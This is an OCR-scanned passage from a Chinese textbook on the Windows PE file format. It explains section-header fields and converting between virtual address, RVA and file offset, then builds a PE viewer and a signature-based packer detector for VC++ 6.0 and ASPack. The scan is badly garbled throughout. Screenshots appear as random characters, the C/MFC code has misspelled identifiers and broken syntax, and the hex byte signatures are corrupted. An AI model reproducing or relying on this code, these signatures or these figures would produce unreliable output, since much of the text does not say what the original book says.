介绍 IMAGE SECTION_HEADER 结构 体 的 各 个 成 员 变量 。 

Name: 该 成 员 变量 保存 着 节 表 项 的 名 称 ,， 节 的 名 称 用 ASCII 编码 来 保存 。 节 名 称 的 长 度 


为 IMAGE SIZEOF_SHORT NAME， 这 是 一 个 宏 ， 其 定义 如 下 : 
#define IMAGE SIZEOF SHORT NAME 8 


节 名 的 长 度 为 8 字 节 ， 多 余 的 字 节 会 被 自动 截断 。 通 常情 况 下 ， 节 名 “.” 为 开始 。 当 然 ， 
这 是 编译 器 的 习惯 ， 并 非 强制 性 的 约定 。 下 面 来 看 图 6-13 中 文件 偏 移 0x000001C0 处 的 前 8 
字 节 的 内 容 “2E 74 65 78 74 00 00 00”， 其 对 应 的 ASCII 字符 为 “.text”。 

VirtualSize: 该 值 为 数据 实际 的 节 表 项 大 小 ， 不 一 定 是 对 齐 后 的 值 。 

VirtualAddress: 该 值 为 该 节 表 项 载 入 内 存 后 的 相对 虚拟 地 址 。 这 个 地 址 是 按 内 存 进 行 对 
齐 的 。 

SizeOfRawData: 该 节 表 项 在 磁盘 上 的 大 小 ， 该 值 通常 是 对 齐 后 的 值 ， 但 是 也 有 例外 。 

PointerToRawData: 该 节 表 项 在 磁盘 文件 上 的 偏 移 地 址 。 

Characteristics: 节 表 项 的 属性 ， 该 属性 的 部 分 取 值 如 图 6-14 所 示 。 


该 世 区 合 代码 
x2 区 为 可 执行 
x 可 ji 
区 为 再 
















a XK 
0x10000000 | 该 节 区 为 可 共享 


图 6-14 节 表 项 属性 的 部 分 取 值 


IMAGE_SECTION_HEADER 结构 体 主要 用 到 的 成 员 变 量 只 有 这 6 个 ， 其 余 不 是 必须 要 
了 解 的 ， 这 里 不 做 介绍 。 关 于 IMAGE SECTION HEADER 结构 体 的 介绍 就 到 这 里 。 


6.3 PE 结构 的 地 址 与 地 址 的 转换 


在 上 一 章 中 用 OD 调试 器 调试 程序 时 看 到 的 地 址 与 本 章 使 用 C32Asm 以 十 六 进 制 形 式 查 
看 程序 时 的 地 址 形式 有 所 差异 。 程 序 在 内 存 中 与 在 文件 中 有 着 不 同 的 地 址 形式 ， 而 且 PE 相 
关 的 地 址 不 只 有 这 两 种 形式 。 与 PE 结构 相关 的 地 址 形式 有 3 种 ， 且 这 3 种 地 址 形式 可 以 进 
行 转换 。 

6.3.1 与 PE 结构 相关 的 3 种 地 址 


与 PE 结构 相关 的 3 种 地 址 是 VA (虚拟 地 址 )、RVA (相对 虚拟 地 址 ) 和 FileOffset ( 文 
件 偏 移 地 址 )。 








6.3 PE 结构 的 地 址 与 地 址 的 转换 








VA 虚拟 地 址 ):， PE 文件 映射 到 内 存 后 的 地 址 。 

RVA (相对 虚拟 地 址 )， 内 存 地 址 相对 于 映射 基地 址 的 偏 移 地 址 。 

FileOffset 〈 文 件 偏 移 地 址 ): 相对 PE 文件 在 磁盘 上 的 文件 开头 的 偏 移 地 址 。 

这 3 种 地 址 都 是 和 PE 文件 结构 密切 相关 的 ， 前 面 简单 地 引用 过 这 几 个 地 址 ， 但 是 前 面 
只 是 个 概念 。 从 了 解 节 表 开始 ， 这 3 种 地 址 的 概念 就 非常 重要 了 ， 否 则 后 面 的 很 多 内 容 都 将 
无 法 理解 。 

这 3 个 概念 之 所 以 重要 ， 是 因为 后 面 要 不 断 地 使 用 它们 ， 而 且 三 者 之 间 的 关系 也 很 重要 。 
每 个 地 址 之 间 的 转换 也 很 重要 ， 尤 其 是 VA 和 FileOffset 的 转换 、RVA 和 FileOffset 之 间 的 转 
换 。 这 两 个 转换 不 能 说 复杂 ， 但 是 需要 一 定 的 公式 。VA 和 RVA 的 转换 就 非常 简单 了 。 

PE 文件 在 磁盘 上 和 在 内 存 中 的 结构 是 一 样 的 。 所 不 同 的 是 ， 在 磁盘 上 ， 文 件 是 按照 
IMAGE OPTIONAL HEADER 的 FileAlignment 值 进行 对 齐 的 。 而 在 内 存 中 ， 映 像 文 件 是 按 
照 IMAGE OPTIONAL HEADER 的 SectionAlignment 进行 对 齐 的 。 这 两 个 值 前 面 已 经 介绍 
过 了 ， 这 里 再 进行 简单 的 回顾 。FileAlignment 是 以 磁盘 上 的 扇 区 为 单位 的 ， 也 就 是 说 ， 
FileAlignment 最 小 为 512 字 节 ， 十 六 进 制 的 0x200 字 节 。 而 SectionAlignment 是 以 内 存 分 页 
为 单位 来 对 齐 的 ， 通 常 Win32 平台 一 个 内 存 分 页 为 4KB， 也 就 是 十 六 进 制 的 0x1000 字 节 。 
一 般 情 况 下 ，FileAlignment 的 值 会 与 SectionAlignment 的 值 相 同 ， 
这 样 磁盘 文件 和 内 存 映 像 的 结构 是 完全 一 样 的 。 当 FileAlignment 
的 值 和 SectionAlignment 的 值 不 相同 的 时 候 ， 就 存在 一 些 细微 的 关 
异 了 , 其 主要 区 别 在 于 , 根据 对 齐 的 实际 情况 而 多 填充 了 很 多 0 值 。 

PE 文件 映射 如 图 6-15 所 示 。 

除了 文件 对 齐 与 内 存 对 齐 的 差异 以 外 ， 文 件 的 起 始 地 址 从 0 地 
址 开始 ， 用 C32Asm 的 十 六 进 制 模式 查看 PE 文件 时 起 始 位 置 是 图 615 PB 文 林 映 里 图 
0x00000000 。 而 在 内 存 中 ， 它 的 起 始 地 址 为 IMAGE OPTIONAL HEADER 结构 体 的 


ImageBase 字段 (该 说 法 只 针对 EXE 文件 ，DLL 文件 的 映射 地 址 不 一 定 固定 , 但 是 绝对 不 会 
是 0x00000000 地 址 )。 


6.3.2 3 种 地 址 的 转换 


当 FileAlignment 和 SectionAlignment 的 值 不 相同 时 ， 磁 盘 文 件 与 内 存 映 像 的 同一 节 表 数 
据 在 磁盘 和 内 存 中 的 偏 移 也 不 相同 ， 这 样 两 个 偏 移 就 发 生 了 一 个 需要 转换 的 问题 。 当 知道 某 
数据 的 RVA， 想 要 在 文件 中 读 取 同样 的 数据 的 时 候 ， 就 必须 将 RVA 转换 为 FileOffset。 反 之 ， 
也 是 同样 的 情况 。 | 

下 面 用 一 个 例子 来 介绍 如 何 进行 转换 。 还 
记得 前 面 为 了 分 析 PE 文件 结构 而 写 的 那个 用 
MessageBox() 输 出 “Hello World” 的 例子 程序 
吗 ? 用 PEID 打开 它 ， 查 看 它 的 节 表 情况 ， 如 
图 6-16 所 示 。 -一 一 一 

从 图 6-16 的 标题 栏 可 以 看 到 ， 这 里 不 叫 a 罗 二 系 引 让 间 
“ 节 表 ”， 而 叫 “ 区 段 ” 还 有 别 的 资料 上 称 之 为 “区 块 ” 或 “ 节 区 ” 只 是 叫 法 不 同 ， 内 容 都 
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是 一 样 的 。 

从 图 6-16 中 可 以 看 到 ， 节 表 的 第 一 个 节 区 的 节 名 称 为 “.text”。 通 常情 况 下 ， 第 一 个 节 
表 项 都 是 代码 区 ， 入 口 点 也 通常 落 在 这 个 节 表 项 。 在 早期 壳 不 流行 时 ， 通 过 判断 入 口 点 是 否 
在 第 一 个 节 区 就 可 以 判断 该 程序 是 否 被 病毒 感 。 如 今 ， 由 于 壳 的 流行 ， 这 种 判断 方法 就 不 可 
靠 了 。 关 键 要 看 的 是 “R. 偏 移 ” 表明 了 该 节 区 在 文件 中 的 起 始 位 置 。PE 头 部 包括 DOS 头 、 
PE 头 和 节 表 ， 通 常 不 会 超过 512 字 节 ， 也 就 是 说 ， 不 会 超过 0x200 的 大 小 。 如 果 这 个 “R. 
偏 移 ”为 0x00001000， 那 么 通常 情况 下 可 以 确定 该 文件 的 磁盘 对 齐 大 小 为 0x1000 注意 : 这 
个 测试 程序 是 笔者 自己 写 的 ， 因 此 比较 熟悉 程序 的 PE 结构 。 而 且 这 也 是 一 种 经 验 的 判断 。 
严格 来 讲 ， 还 是 要 去 查看 IMAGE OPTIONAL HEADER 的 SectionAlignment 和 FileAlignment 
两 个 成 员 变 量 的 值 )。 测 试验 证 一 下 这 个 程序 ， 看 到 “VY. 偏 移 ” 与 “R. 偏 移 ” 相 同 ， 则 说 明 磁 
盘 对 齐 与 内 存 对 齐 是 一 样 的 ， 这 样 就 没 办 法 完成 演示 转换 的 工作 了 。 不 过 ， 可 以 人 为 地 修改 
文件 对 齐 大 小 。 也 可 以 通过 工具 来 修改 文件 对 齐 的 大 小 。 这 里 借助 LordPE 来 修改 其 文件 对 
齐 大 小 。 修 改 方法 很 简单 ， 先 将 要 修改 的 测试 文件 复制 一 份 ， 以 与 修改 后 的 文件 做 对 比 。 打 
开 LordPE， 单 击 “ 重 建 PE” 按 钮 ， 然 后 选择 刚才 复制 的 那个 测试 文件 ， 如 图 6-17 和 图 6-18 
所 示 。 





ESN 山口 浊 


二 [LordpPE 训 华 版 ] by Yoda 





















6-17 LordPE 界面 


PE 重建 功能 中 有 压缩 文件 大 小 的 功能 ， 这 里 的 压缩 也 就 是 修改 磁盘 文件 的 对 齐 值 ， 避免 
过 多 地 因 对 齐 而 进行 补 0， 使 其 少 占用 磁盘 空间 。 用 PEID 查看 这 个 进行 重建 的 PE 文件 的 节 
表 ， 如 图 6-19 所 示 。 


下 
000029FC 00004000 ”000024C9 50000040 





新 的 文件 大 小 :64CSh 
MN : 89% 


[Ei 





图 6-18 重建 PE 功能 结果 图 6-19 重建 PE 文件 后 的 节 表 


现在 可 以 看 到 “V. 偏 移 ” 与 “R. 偏 移 ” 的 值 不 相同 了 ， 它 们 的 对 齐 值 也 不 相同 了 ， 大 家 
可 以 自己 验证 一 下 FileAlignment 和 SectionAlignment 的 值 是 否 相 同 。 
现在 有 两 个 功能 完全 一 样 ， 而 且 PE 结构 也 一 样 的 两 个 文件 了 ， 唯 一 的 不 同 就 是 其 磁盘 





革 一 个 





6.3 PE 结构 的 地 址 与 地 址 的 转换 





对 齐 大 小 不 同 。 现 在 在 这 两 个 程序 中 分 别 寻 找 一 个 节 表 中 的 数据 , 学 习 不 同 地 址 之 间 的 转换 。 
先 用 OD 打开 未 进行 重建 PE 结构 的 测试 程序 ， 找 到 反 汇 编 中 调用 MessageBox() 处 要 弹 
出 对 话 框 的 两 个 字符 串 参 数 的 地 址 ， 如 图 6-20 和 图 6-21 所 示 。 


TS 6A 99 


Te OO 
BENZ | 。 68 486084000| push B8406 0648 || Title = ”hello' 

DiWTWO7 | . 658 30684800|| push Dong6 838 由 Text = “hello worldy” 
Boye Cc howner = NU 


| 6a a9 Ps 
NBNWDTUDEE | . FF15 9C50499! SR 
nl| . 33c8 xor 
iL C2 1990 | 醒 醒 





图 6-20” MessageBox0O) 函 数 中 使 用 的 字符 串 地 址 





RD3D6538 68 65 6¢ 6C 6F 28 77 6F 72 6C 64 21 88 96 88 89 hello world?.... 
Ondo 68 65 HC HC 6F bb 0 0 9D 11 hg 99 92 88 98 60 hello...?8.~.. 


图 6-21 两 个 字符 串 的 地 址 在 数据 窗口 的 显示 





从 图 6-20 和 图 6-21 中 可 以 看 到 ， 字 符 串 “hello world !” 的 地 址 为 0x00406030， 字 符 串 
“hello” 的 地 址 为 0x00406040。 这 两 个 地 址 都 是 虚拟 地 址 ， 也 就 是 VA。 

将 VA〔〈 虚 拟 地 址 ) 转换 为 RVA《〈 相 对 虚拟 地 址 ) 是 很 容易 的 ，RVA (相对 虚拟 地 址 ) 
为 VA〈 虚 拟 地 址 ) 减 去 IMAGE OPTIONAL HEADER 结构 体 中 的 ImageBase( 映 像 文件 的 
装载 虚拟 地 址 ) 字段 的 值 ， 即 RVA = VA - ImageBase = 0x00406030 - 0x00400000 = 0x0000 
6030。 由 于 IMAGE_ OPTIONAL_HEADER 中 的 SectionAlignment 和 FileAlignment 的 值 相 同 ， 
因此 其 FileOffset 的 值 也 为 0x00006030。 用 C32Asm 打开 该 文件 查看 文件 偏 移 地 址 0x00006030 
处 的 内 容 ， 如 图 6-22 所 示 。 


gggoeze:| 0 HU 9 SU VU 9 gy gy bg 9 gH 9 JU 9g bb 9 | --------.------- 
88886838:| 68 65 6C 6C 6F 28 77 6F 72 6C 64 21 86 88 88 68 | hello worldy...- 
B8886840:| 68 65 6C 6C 6F 688 88 689 9D 11 #8 688 82 89 88 88 hello---?@--- -人 
NMBA A A A NR NN A A A NP A A A sn an A nn ~ ' 





图 6-22 文件 偏 移 0x00006030 处 的 内 容 为 “hello world!” 字 符 串 


从 这 个 例子 中 可 以 看 出 ， 当 SectionAlignment 和 FileAlignment 相同 时 ， 同 一 节 表 项 中 数 
据 的 RVA (相对 虚拟 地 址 ) 和 FileOffset 〈 文 件 偏 移 地 址 ) 是 相同 的 。RVA 的 值 是 用 VA -- 
ImageBase 计算 得 到 的 。 

再 用 OD 打开 “重建 PE” 后 的 测试 程序 ， 同样 找到 反 汇 编 中 调用 MessageBox() 函 数 使 用 
的 那个 字符 串 “hello world !”， 看 其 虚拟 地 址 是 多 少 。 它 的 虚拟 地 址 仍然 是 0x00406030。 同 
样 ， 用 虚拟 地 址 减 去 装载 地 址 ， 相 对 虚拟 地 址 的 值 仍然 为 0x00006030。 不 过 用 C32Asm 打开 
该 文件 查看 的 话 会 有 所 不 同 。 用 C32Asm 看 一 下 0x00006030 地 址 处 的 内 容 ， 如 图 6-23 所 示 。 


:| 88 88 88 688 986 89 89 86 86 86 98 66 68 98 §6 99 | ---------------- 
:| 区 98 98 88 ee 88 69 86 88 88 68 88 99 88 69 86 人 
-88 88 99 89 88 88 99 08 89 5S6 39 98 §6 $6 86 86 | ---------------- 





图 6-23 ”文件 偏 移 0x00006030 处 没有 “hello world!” 字 符 串 


从 图 6-23 中 可 以 看 到 ， 用 C32Asm 打开 该 文件 后 ， 文 件 偏 移 0x00006030 处 并 没有 “hello 
world!” 和 “hello” 字 符 串 。 这 就 是 由 文件 对 齐 与 内 存 对 齐 的 差异 所 引起 的 。 这 时 就 要 通过 
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一 些 简单 的 计算 把 RVA 转换 为 FileOffset。 

把 RVA 转换 为 FileOffset 的 方法 很 简单 ， 首 先 看 一 下 当前 的 RVA 或 者 是 FileOffset 属于 
哪个 节 。0x00006030 这 个 RVA 属于 .data 节 。0x00006030 这 个 RVA 相对 于 该 节 的 起 始 RVA 
地 址 0x00006000 来 说 偏 移 0x30 字 节 。 再 看 .data 节 在 文件 中 的 起 始 位 置 为 0x00004000， 
以 .data 节 的 文件 起 始 偏 移 0x00004000 加 上 0x30 字 节 的 值 为 0x00004030。 用 C32Asm 看 一 
下 0x00004030 地 址 处 的 内 容 ， 如 图 6-24 所 示 。 


899694829:| 99 98 88 99 99 99 88 9D 99 86 99 98 99 88 99 86 
B8884839:| 68 65 6C 6C 6F 28 77 6F 72 6C 64 21 98 988 98 99 Bello worIdy . 





图 6-24 0x00004030 文件 偏 移 处 的 内 容 


从 图 6-24 中 可 以 看 出 ， 该 文件 偏 移 处 保存 着 “hello world !” 字 符 串 ， 也 就 是 说 ， 将 RVA 
转换 为 FileOffset 是 正确 的 。 通 过 LordPE 工具 来 验证 
一 下 ， 如 图 6-25 所 示 。 

再 来 回顾 一 下 这 个 过 程 。 

某 数据 的 文件 偏 移 = 该 数据 所 在 节 的 起 始 文件 
偏 移 +《〈 某 数据 的 RVA -该 数据 所 在 节 的 起 始 RVA )。 

除了 上 面 的 计算 方法 以 外 ， 还 有 一 种 计算 方法 ， es 
即 用 节 的 起 始 RVA 值 减 去 节 的 起 始 文件 偏 移 值 , 得 到 6-25 用 LordPE 计算 RVA 为 0x00006030 
一 个 差 值 , 再 用 RVA 减 去 这 个 得 到 的 差 值 , 就 可 以 得 iA 
到 其 所 对 应 的 FileOffset。 读者 可 以 使 用 例子 程序 进行 手工 计算 , 然后 通过 LordPE 进行 验证 。 

知道 如 何 通 过 RVA 转换 为 文件 偏 移 ， 那 么 通过 文件 偏 移 转换 为 RVA 的 方法 也 就 不 难 了 。 
这 3 种 地 址 相互 的 转换 方法 就 介绍 完了 。 读 者 如 果 没 有 理解 ， 就 可 以 反复 地 按照 公式 进行 学 
习 和 计算 。 只 要 在 头脑 中 建立 关于 磁盘 文件 和 内 存 映 像 的 结构 , 那么 理解 起 来 就 不 会 太 吃力 。 
在 后 面 的 例子 中 ， 将 会 写 一 个 类 似 LordPE 中 转换 3 种 地 址 的 程序 ， 以 帮助 读者 加 强 理解 。 


6.4 PE 相关 编程 实例 


前 面 讲 的 都 是 概念 性 的 知识 ， 本 节 主 要 编写 一 些 关 于 PE 文件 结构 的 程序 代码 ， 以 帮助 
读者 加 强 对 PE 结构 的 了 解 。 


6.4.1 PE 查看 器 


写 PE 查看 器 并 不 是 件 复杂 的 事情 ， 只 要 按照 PE 结构 一 步 一 步 地 解析 就 可 以 了 。 下 面 简 
单 地 解析 其 中 几 个 字段 内 容 ， 显 示 一 下 节 表 的 信息 ， 其 余 的 内 容 只 要 稍 作 修 改 即 可 。PE 查看 
器 的 界面 如 图 6-26 所 示 。 

PE 查看 器 的 界面 按照 图 6-26 所 示 的 设置 , 不 过 这 个 可 以 按照 个 人 的 偏好 进行 布局 设置 。 
编写 该 PE 查看 器 的 步骤 为 打开 文件 并 创建 文件 内 存 映像 ， 判 断 文件 是 否 为 PE 文件 并 获得 
PE 格式 相关 结构 体 的 指针 ， 解 析 基 本 的 PE 字段 ， 枚 举 节 表 ， 最 后 关闭 文件 。 需 要 在 类 中 添 

















6.4 PE 相关 编程 实例 





加 几 个 成 员 变 量 及 成 员 函 数 ， 添 加 的 内 容 如 图 6-27 所 示 。 





EX x class CPeParseDlg : public CDialog 











« 
gr a 
上 站 VOID EnumSections(); Wd 全 二 让 
Xa: ps 38: 入 VDID ParseBasePe(); /1 租 1 基础 PE 字段 
Fe ee VOID FileClose(); 7 关闭 文件 
岗 售 基 址 : 。 后 1050000 文件 对 齐 ; 150000505 PIMABE_DOS_HEADER m_RDosHdre; /1 bos 头 指 补 
PIMAGE_ NT_HEADERS PNEHdr3 /1 PE 站 和 
连接 器 版 本 : | 内 存 齐 开 :JD01000 PIMAGE SECTION HEADER nm PSecHdey 77 节 表 指 革 
Lv 大 小 | 标志 B00L FileCreate(char *szfleName); /17Y 打开 妆 件 并 创建 映像 视图 
tat 00001000 CO0TT 本 D0007800 8 LEPUOID m_ jpEBasey 映像 视 图 指针 
rsre 000B000 00007F20 00008400 4 HANDLE m hitaps 映 笨 ， 各 
HANDLE m hFiles 六 
B60L 1sPeFfileAndGetPEPointer(); 5 香 肖 PE 女 件 ， 并 获取 相关 结构 指针 
- VaiID InitSectiontist(); 化 列表 框 
ws | 
CPepParseDlg(CWnd* pParent = NULL); // standard constryuctor 
图 6-26 PE 查看 器 解析 记事 本 程序 图 6-27 ”在 类 中 添加 的 成 员 变 量 及 成 员 函 数 


按照 前 面 所 说 的 顺序 ， 依 次 实现 添加 的 各 个 成 员 函 数 。 
BOOL CPePparseDlg::FileCreate (Chatr *szFileName) 
{ 

BOOL bRet = FALSE; 


mhrFile = CreateFile (szFileName, 
GENERIC READ | GENERIC WRITE, 
FILE SHARE READ, 
NULL, 
QPEN EXISTING, 
FILE ATTRIBUTE NORMAL, 
NULL); 

if ( mhrile == INVALID HANDLE VALUE ) 

{ 人 

return bRet; 


} 


m hMap = CreateFileMapping (m hFile, NULL, 
PAGE READWRITE | SEC IMAGE, 
OQ# OQ 0) 
if ( mhMap == NULL ) 
{ 
CloseHandle (m hFile); 
return bRet; 
} 


m lpBase = MapViewOfFile (m hMap, 
FILE MAP READ | FILE SHARE WRITE, 
0，0，0): 
if ( m lpBase == NULEL ) 
4 
CloseHandle'(m hMap); 
CloseHandle (m hrFile); 
return bRet; 


} 


bRet = TRUE; 
return bRet; 


} 

这 个 函数 的 主要 功能 是 打开 文件 并 创建 内 存 文件 映像 。 通 和 常 对 文件 进行 连续 读 写 时 直接 
使 用 ReadFile0 和 WriteFile0) 两 个 函数 。 当 不 连续 操作 文件 时 , 每 次 在 ReadFile( 或 者 WriteFile() 
后 就 要 使 用 SetFilePointer() 来 调整 文件 指针 的 位 置 ， 这 样 的 操作 较为 繁琐 。 内 存 文件 映像 的 
作用 是 把 整个 文件 映射 入 进程 的 虚拟 空间 中 ， 这 样 操 作文 件 就 像 操作 内 存 变量 或 内 存 数据 一 
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样 方便 。 
创建 内 存 文件 映像 所 使 用 的 函数 有 两 个 ， 分 别 是 CreateFileMapping() 和 MapViewOfFile()。 
CreateFileMapping(O 函 数 的 定义 如 下 : 
HANDLE CreateFileMapping'( 
HANDLE hFile, 
LPSECURITY ATTRIBUTES lpAttributes, 
DWORD FilProtedtb, 
DWORD dwMaximumSizeHigh, 


DWORD dwMaximumSizeLow, 
LPCTSTR lpName 


jy 
参数 说 明 如 下 。 
hFile: 该 参数 是 CreateFileO) 函 数 返 回 的 句柄 。 
lpAttributes: 是 安全 属性 ， 该 值 通常 是 NULL。 
flProtect: 创建 文件 映射 后 的 属性 ， 通 常设 置 为 可 读 可 写 PAGE_READWRITE。 如 果 需 
要 像 装载 可 执行 文件 那样 把 文件 映射 入 内 存 的 话 ， 那 么 需要 使 用 SEC_ IMAGE。 
最 后 3 个 参数 在 这 里 为 0。 如 果 创 建 的 映射 需要 在 多 进程 中 共享 数据 的 话 ， 那 么 最 后 一 
个 参数 设 定 为 一 个 字符 串 ， 以 便 通过 该 名 称 找到 该 块 共享 内 存 。 
该 函数 的 返回 值 为 一 个 内 存 映 射 的 句柄 。 
MapViewOfFile0 函 数 的 定义 如 下 : 
LPVOID MapVieéewOFFileél 
HANDLE hrFileMappingObject, 
DWORD dwDesiredAccess, 
DWORD dwFileOffsetHigh, 
DWORD dwFileOffsetLow;, 


SIZE_T dwNumberOfBytesToMap 
Ds: 


参数 说 明 如 下 。 

hFileMappingObject: 该 参数 为 CreateFileMapping() 返 回 的 句柄 。 

dwDesiredAccess: 想 获 得 的 访问 权限 ， 通 常情 况 下 也 是 可 读 可 写 FILE MAP READ、 
FILE MAP WRITE. 

最 后 3 个 参数 一 般 给 0 值 就 可 以 了 。 

按照 编程 的 规矩 ， 打 开 要 关闭 ， 申 请 要 释放 。CreateFileMapping0) 的 关闭 需要 使 用 CloseHandle() 
函数 。MapViewOfFile() 的 关闭 ， 要 使 用 UnmapViewOfFile0 函 数 ， 该 函数 的 定义 如 下 : 


BOOL UnmapViewOfFile!( 
LPCVOID lpBaseAddress 
); 
该 函数 的 参数 就 是 MapViewOfFile0) 函 数 的 返回 值 。 
接着 说 PE 查看 器 ,文件 已 经 打开 ， 就 要 判断 文件 是 否 为 有 效 的 PE 文件 了 。 如 果 是 有 效 
的 PE 文件， 就 把 解析 PE 格式 的 相关 结构 体 的 指针 也 得 到 。 代 码 如 下 : 


BOOL CPeparseDlg::IsPeFileAndGetPEPointer() 
{ 
BOOL bRet = FALSE; 


/7 判断 是 否 为 Mz 头 
m pDosHdr = (PIMAGE DOS HEADER)m lpBase; 


if ( mpDosHdr->e magie != IMAGE. DOS_ SIGNATURE ) 
{ 


eturn DRetr 








4 ) 


非常 容易 理解 ， 继 续 看 解析 PE 格式 的 部 分 。 


没有 过 多 复杂 的 内 容 。 获 取 导 
入 表 、 导 出 表 比 获取 基础 信息 复杂 。 关 于 导入 表 、 导 出 表 的 内 容 将 在 后 面 介绍 。 接 下 来 进行 
天 的 举 ， 具 体 代码 
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mSectionLIst.SetIitemText(i, 1, StrTmp); 


第 StrTmp.Format ("$08X", m pSecHdr[i] .Misc.VirtualSize); 
6 m_SectionLIst.SetIitemText (i, 2, StrTmp); 
章 StrTmp.Format ("%$08X", m pSecHdr[i].PointerToRawData); 
加 m SectionLIst.SetItemText (i, 3, StrTmp); 
密 StrTmp. Format ("%08X", m pSecHdr[i].SizeOfRawData); 
a m_ SectionlIst.SetItemTrext (i, 4, StrTmp); 
密 Strimp.Format ("S08X", m pSecHdr[i].Characteristics): 
m SectionLIst.SetIitemText (i, 5, StrTmp); 
} 
[EEC 1! 


最 后 的 动作 是 释放 动作 ， 因 为 很 简单 ， 这 里 就 不 给 出 代码 了 。 将 这 些 自 定义 函数 通过 界 
面 上 的 “查看 ”按钮 联系 起 来 ， 整 个 PE 查看 嚣 就 算是 写 完 了 。 


6.4.2 ”简单 的 查 壳 工具 


前 面 介绍 了 通过 编程 解析 PE 文件 格式 的 基础 数据 ， 对 于 PE 文件 格式 的 解析 其 实 并 不 难 ， 
难点 在 于 兼容 性 。 从 前 面 的 内 容 中 可 以 看 到 ，PE 文件 结构 中 大 多 用 的 是 偏 移 地 址 ， 因 此 ， 只 
要 偏 移 地 址 和 实际 的 数据 相符 ， 那 么 PE 文件 格式 有 可 能 是 内 套 的。 也 就 是 说 ，PE 文件 是 可 
以 变形 的 ， 只 要 保证 其 偏 移 地 址 和 PE 文件 格式 的 结构 基本 就 没 多 大 问题 。 

对 于 PE 可 执行 文件 来 说 ， 为 了 保护 可 执行 文件 或 者 是 压缩 可 执行 文件 ， 通 常会 对 该 文 
件 进行 加 壳 。 接 触 过 软件 破解 的 人 应 该 都 清楚 过 的 概念 。 关 于 壳 的 概念 ， 这 里 就 不 多 说 了 。 
下 面 来 写 一 个 查 壳 的 工具 。 

首先 ， 用 ASPack 给 前 面 写 的 程序 加 个 过。 打开 ASPack 加 壳 工 具 ， 如 图 6-28 所 示 。 

对 测试 用 的 软件 进行 一 次 加 壳 ， 不 过 在 加 过 前 先 用 PEiD 查看 一 下 ， 如 图 6-29 所 示 。 
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图 6-28 ASPack 加 壳 工 具 界 面 


从 图 6-29 可 以 看 出 ， 该 程序 是 Visual C++ 5.0 ET 
Debug 版 的 程序 。 其 实 该 程序 是 用 Visual C++ 6.0 
写 的 , 这 里 是 PEiD 识别 有 误 。 不 过 只 要 用 Visual 
C++ 6.0 进行 编译 选择 Release 版 时 ，PEiD 是 可 
以 正确 进行 识别 的 。 使 用 ASPack 对 该 程序 进行 
加 壳 ， 然 后 用 PEiD 查 壳 ， 如 图 6-30 所 示 。 ) 

从 图 6-30 中 可 以 看 出 ，PEiD 识别 出 文件 被 图 6-30 ”用 PEiD 查看 加 过 后 的 文件 











中 
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加 过 壳 ， 且 是 用 ASPack 进行 加 壳 的 。PEiD 如 何 识别 程序 被 加 壳 ， 以 及 加 了 哪 种 壳 呢 ? 在 PEiD 
的 目录 下 有 一 个 特征 码 文 件 ， 名 为 “userdb.txt” 打开 这 个 文件 ,看 大 概 内 容 就 能 知道 里 边 保 
存 了 这 的 特征 码 。 程 序 员 的 任务 就 是 自己 实现 一 个 这 个 壳 的 识别 工具 。 

壳 的 识别 是 通过 特征 码 进 行 的 ， 特 征 码 的 提取 通常 是 选择 文件 的 入 口 处 。 壳 会 修改 程序 
的 入 口 处 ， 因 此 对 于 壳 的 特征 码 来 说 ， 选 择 入 口 处 比较 合适 。 这 里 的 工具 主要 是 用 来 学 习 和 
演示 用 的 ， 因 此 写 的 查 壳 工具 要 能 识别 两 种 类 型 ， 第 一 种 类 型 是 可 以 识别 用 Visual C++ 6.0 
编译 出 来 的 文件 ， 第 二 种 类 型 是 可 以 识别 ASPack 加 壳 后 的 程序 。 当 然 ，ASPack 加 壳 工具 的 
版 本 众多 ， 这 里 只 要 能 识别 上 面 所 演示 版 











本 的 ASPack 就 可 以 了 。 
如 何 提取 特征 码 呢 ? 程序 无 论 是 在 磁 。 jn ra 
盘 上 还 是 在 内 存 中 , 都 是 以 二 进 制 的 形式 存 5| 68 B0654180 pas 08416500 
在 的 。 前面 也 提 到 , 特征 码 是 从 程序 的 入 口 于 ee feeeel ee 
O402895 58 push Bax 
处 进行 提取 的 ， 那么 可 以 使 用 C32Asm yl sara : 64:8925 8998i nou er ptr fs:[9] ，esp 
十 六 进 制 的 形式 打开 这 些 文件 ， 在 入 口 | 交 |: 
处 提取 特征 码 ， 也 可 以 用 OD 将 程序 载 。 | 22 于 Br 
Et R 804028AD|| - ush 2 

入 内 存 后 提取 特 征 码 。 这 里 选择 使 用 OD Sown289F|| - FF erme Bi a [<&HSUCRTD .set_app | 
提取 特征 码 。 用 OD 载 入 未 加 这 的 程序 ， || peo 

a Bing2Bb7 | . A3 46794180 |mou dword ptr [417948], eax 
加 图 6-31 所 示 。 aua2BEP | . FF15 1987519! 双 dword ptr [<&MSUCRTD. _p 


可 以 看 到 ， 这 就 是 未 加 这 程序 的 入 口 图 6-31 OD 载 入 为 加 壳 文 件 的 入 口 处 
处 代码 。 在 图 6-31 中 ,“HEX 数据 ” 列 中 就 是 代码 对 应 的 十 六 进 制 编码 ， 这 里 要 做 的 就 是 提 
取 这 些 十 六 进 制 编码 。 提 取 结 果 如 下 : 


mANX55NX8EBNXBECNX6RANXEENX68NXOONX65NX41NXX00” \ 
YNxXx68NxEBNx2DNx40Nx00Nx64NxXALNXO0ONzO0NxOoO N\ 
mANXx00NXx50Nx<64\x89NXx25NXx00NK00Nx00NXx00Nx83m \ 
TANXC4NX947 


根据 这 个 步 又， 把 ASPack 的 特征 码 也 提取 出 来 ， 提 取 结 果 如 下 : 
"NGONXES\XO03\xXOO0NXOO\ZOO\xE9N\xEB\xO04\x5D" \ 
"T\XA45\X55\xC3\xE8\xO0l1\xO00\xO00\x00\xEB\xS5D" \ 
"\xBB\xED\xFEF\xFFNXFEF\KXO03\xDD\x81\xEB\x00" 

NECONROLY 


有 了 这 些 特征 码 ， 就 可 以 开始 编程 了 。 先 来 定义 一 个 数据 结构 ， 用 来 保存 特征 码 ， 该 结 
构 如 下 : 


#define NAMELEN 20 
#define SIGNLEN 32 


typedef struact _SIGN 
{ 
char szName [NAMELEN]; 
BYTE bsSign([SIGNLEN + 1]; 
}SIGN, *PSTGN; 


利用 该 数据 结构 定义 2 个 保存 特征 码 的 全 局 变量 ， 具 体 如 下 : 
SIGN Sign{2] = 
{ 
{ 
AAA NGG 
"ye6", 
"\x55\x8B\xEC\xX6A\xEFF\x68\x00\x65\x41\x00" \ 
"\x68\xXEB8\x2D\x40\x00\x64\xAlT1\x00\x00\x00" \ 
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"\xO00\x50\x64\x89\x25\x00Nx00\x00\x00Nx83" \ 
